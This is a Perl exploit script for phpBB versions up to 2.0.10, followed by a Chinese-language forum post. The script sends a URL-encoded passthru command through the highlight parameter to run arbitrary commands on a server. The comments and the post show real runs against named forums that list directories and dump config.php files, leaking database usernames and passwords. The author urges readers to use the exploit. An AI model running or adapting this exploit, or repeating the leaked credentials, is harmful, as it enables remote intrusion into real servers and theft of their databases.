use IO::Socket;

## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@
## @@! @@@ @@! @@@ !@@ @@! @@@
## @!@!!@! @!@ !@! !@@!! @!@!@!@!
## !!: :!! !!: !!! !:! !!: !!!
## : : : :.:: : ::.: : : : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/...07/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do
## nothing with it at all. Again, that particular group admit likewise. In a future release
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## total 507
## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .
## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..
## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS
## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin
## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache
## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php
## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php
## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php
## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db
## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs
## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc
## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php
## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files
## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php
## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images
## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes
## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php
## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language
## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php
## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php
## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php
## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php
## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php
## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php
## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php
## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php
## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php
## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates
## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php
## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php
## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## $dbms = "mysql";
## $dbhost = "localhost";
## $dbname = "phpbb";
## $dbuser = "phpbb";
## $dbpasswd = "phpBB_R0cKs";
## $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss....
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## ****ing lamaz...
##
## ccteam.ru
## $dbname = "ccteam_phpbb2";
## $dbuser = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
############################################################
usage:
r57phpbb2010.pl [DIR] [NUM] [CMD]
params:<...l]www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket> )
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###

上面是代码，保存为1.PL
就能用

我对几个版本的PHPBB测试之后发现，对于修改版的PHPBB，无法成功，对于2。0。6以下版本 ，也无法成功，我测试的最低是2。0。4版
好消息就是确实能暴出MYSQL账号，我是每个测试的论坛都注册了1个ID
然后用。
不好的消息，暴出来的几个都是
$dbms = 'mysql';
$dbhost = 'localhost';

当然不是没有可利用的地方，祝大家好运。
:\>2.pl forum.chinavisual.com / 113878 "ls -la"
*** CMD: [ ls -la ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aca
总用量 2364
drwxr-xr-x 16 33 33 4096 11月 22 22:48 .
drwxr-xr-x 6 root root 4096 10月 4 13:28 ..
drwxr-xr-x 2 33 33 4096 10月 9 15:52 admin
drwxr-xr-x 3 root root 4096 10月 5 00:51 attach_mod
-rw-r--r-- 1 root root 4379 10月 4 22:20 attach_rules.php
drwxrwxrwx 2 33 33 4096 11月 11 21:21 cache
-rw-r--r-- 1 root root 19689 10月 5 23:14 cash.php
-rw-r--r-- 1 33 33 5961 10月 5 01:26 common.php
-rw-rw-rw- 1 33 33 248 10月 4 14:00 config.php
drwxr-xr-x 2 33 33 4096 7月 17 23:58 db
drwxrwxrwx 7 root root 4096 10月 4 21:01 dbadmin
drwxr-xr-x 2 33 33 4096 10月 5 02:15 docs
-rw-r--r-- 1 root root 12250 10月 4 22:20 download.php
-rw-r--r-- 1 33 33 810 7月 17 23:58 extension.inc
-rw-r--r-- 1 33 33 3675 10月 4 22:25 faq.php
drwxr-xr-x 2 apache apache 1835008 11月 24 19:11 files
-rw-r--r-- 1 33 33 45641 7月 17 23:58 groupcp.php
drwxrwxr-x 5 apache root 8192 10月 5 00:23 image
drwxr-xr-x 8 apache 33 4096 10月 9 17:28 images
drwxr-xr-x 2 33 33 4096 11月 23 00:49 includes
-rw-r--r-- 1 33 33 14737 10月 5 15:57 index.php
drwxr-xr-x 6 33 33 4096 10月 5 15:55 language
-rw-r--r-- 1 33 33 7479 7月 17 23:58 login.php
-rwx------ 1 root root 4553 10月 5 01:17 logo_phpBB.gif
-rw-r--r-- 1 33 33 12529 10月 5 01:29 memberlist.php
-rw-r--r-- 1 33 33 38572 10月 6 00:07 modcp.php
drwxr-xr-x 3 root root 4096 10月 26 15:12 mods
-rw-r--r-- 1 root root 1592 2002-05-31 news.php
-rwxr-xr-x 1 root root 3782 11月 10 15:36 phpBB2_yeesoft.zip
-rw-r--r-- 1 33 33 37059 10月 6 01:31 posting.php
-rw-r--r-- 1 33 33 73194 10月 5 01:35 privmsg.php
-rw------- 1 root root 32768 10月 4 22:28 .privmsg.php.swp
-rw-r--r-- 1 33 33 3985 10月 5 01:36 profile.php
-rw-r--r-- 1 root root 5889 10月 8 13:58 quick_reply.php
-rw-r--r-- 1 33 33 42692 7月 17 23:58 search.php
drwxr-xr-x 3 root root 4096 11月 22 23:25 syn
drwxr-xr-x 3 33 33 4096 10月 5 15:55 templates
-rw-r--r-- 1 root root 15118 10月 4 22:20 uacp.php
-rw-r--r-- 1 33 33 23296 10月 4 23:18 viewforum.php
-rw-r--r-- 1 33 33 7235 10月 5 02:03 viewonline.php
-rw-r--r-- 1 33 33 45633 10月 8 13:54 viewtopic.php

6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C:\>2.pl forum.chinavisual.com / 113878 "config.php"
*** CMD: [ config.php ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C:\>2.pl forum.chinavisual.com / 113878 "cat config.php"
*** CMD: [ cat config.php ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

f8
<?php

// phpBB 2.x auto-generated config file
// Do not change anything in this file!

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'forum2';
$dbuser = 'root';
$dbpasswd = '';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);